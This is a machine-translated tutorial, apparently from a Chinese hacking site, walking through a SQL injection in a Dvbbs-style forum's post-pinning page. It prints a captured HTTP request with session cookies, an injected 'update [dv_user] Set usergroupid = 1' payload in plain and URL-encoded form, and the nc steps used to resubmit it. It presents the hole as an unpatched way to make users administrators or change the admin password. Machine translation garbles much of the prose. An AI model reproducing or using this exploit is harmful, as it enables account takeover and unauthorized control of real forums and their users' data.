Let the Internet go to hell again

First, look for a layout without fixed posts. It is impossible for a forum to have a fixed forum? Click to see if there are fixed posts or something. I set up my own platform for testing. Of course, the vulnerability conditions must be "met. In the past, the identity of the Postmaster did not have to be logged in as the front-end Postmaster. You just need to fix the post and then post it casually. Then, click set solid top 1.

Stick to the top in normal mode, 2

In this case, we pause and open the WSE packet capture tool to capture the submitted post information. After opening the tool, click "OK. Now let's see what WSE caught. 3.

the post submission information is intercepted and copied. The content is as follows:
post/SQL/admin_postings.asp? Action = Istop HTTP/1.1
Accept: image/GIF, image/X-xbitmap, image/JPEG, image/pjpeg, application/X-Shockwave-flash, */*
Referer: http: // 192.168.1.254/SQL/admin_postings.asp? Action = Istop
Accept-language: ZH-CN
Content-Type: Application/X-WWW-form-urlencoded
Accept-encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; tencenttraveler ;. net CLR 1.1.4322)
HOST: 192.168.1.254
Content-Length: 133
connection: keep-alive
cache-control: no-Cache
COOKIE: 192% 2e168% 2e1% 2e254% 2 fsql % 2f = userid = 1 & usercookies = 0 & Password = 9pb621664s5w7il7 & userhidden = 2 & userclass = % B9 % DC % C0 % ed % D4 % B1 & username = Admin & statuserid = 1929167667; aspsessionidcatqtatt = jjghmomdljjaafhagmlgomil; aspsessionidacttrats = nmlhlbbapmoiegaibmbfoimh; dvbbs =; upnum = 0

Istopaction = 1 & boardid = 1 & id = 1 & Title = & content = A & dowealth = 0 & dousercp = 0 & douserep = 0 & MSG = & ismsg = & getboard = 1 & submit = % C8 % B7 % C8 % CF % B2 % D9 % D7 % F7

What do we do now? Change the getboard to); update [dv_user] Set usergroupid = 1 where userid = 2; -- you must first convert it to unicodecmd.exe and use encoder.exe to convert it, the conversion result is as follows: % 31% 2C % 31% 3B % 29% 75% 70% 64% 61% 5B % 74% 5f % 65% 20% 64% 76% 5d % 75% 73% 65% 72% 20% 73% 65% 74% 20% 75% 73% 65% 72% 6f % 75% 70% 69% 64% 3D % 31% 20% 77% 68% 65% 72% 65% 20% 75% 73% 65% 72% 69% 64% 3D % 32% 3B % 2D % 20
Replace the getboard = 1 with the injection statement. This statement mentions users with userid 2 to the Administrator group, but only the front-end administrator. Then, calculate the number of characters added to change the value of Content-Length. I am too lazy to change it to 250. Submit the modification using NC, 4

The idea is to submit the content of a.txt to nc. after that, the returned information will be stored in 1.htm.

Connect to the 1.htm of our output.

Syntax error? Do you know why? As I mentioned earlier, the length of Content-Length is not counted, and the statement is executed only to); update [dv_user] Set usergroupid = 1 where user, where the statement is not executed completely, is it correct? If we don't need to keep it tight, we can add a few more values to the length and then change it to. Then, we will submit the output result of 1.htm later. 6

No? Operation successful. The injection statement is successfully executed. Let's see if the user with userid = 2 has become the Administrator. the user with userid = 2 is: 619054, to save trouble, I will directly check whether the user's permissions are administrator in the background. 7

 

Haha, It's really upgraded to administrator. This vulnerability can not only upgrade users from common permissions to administrators, but also directly change the password of the background administrator. Is this serious enough? No Patches have been provided for the official forum of the mobile network. Really depressing

Previous Page [1] [2]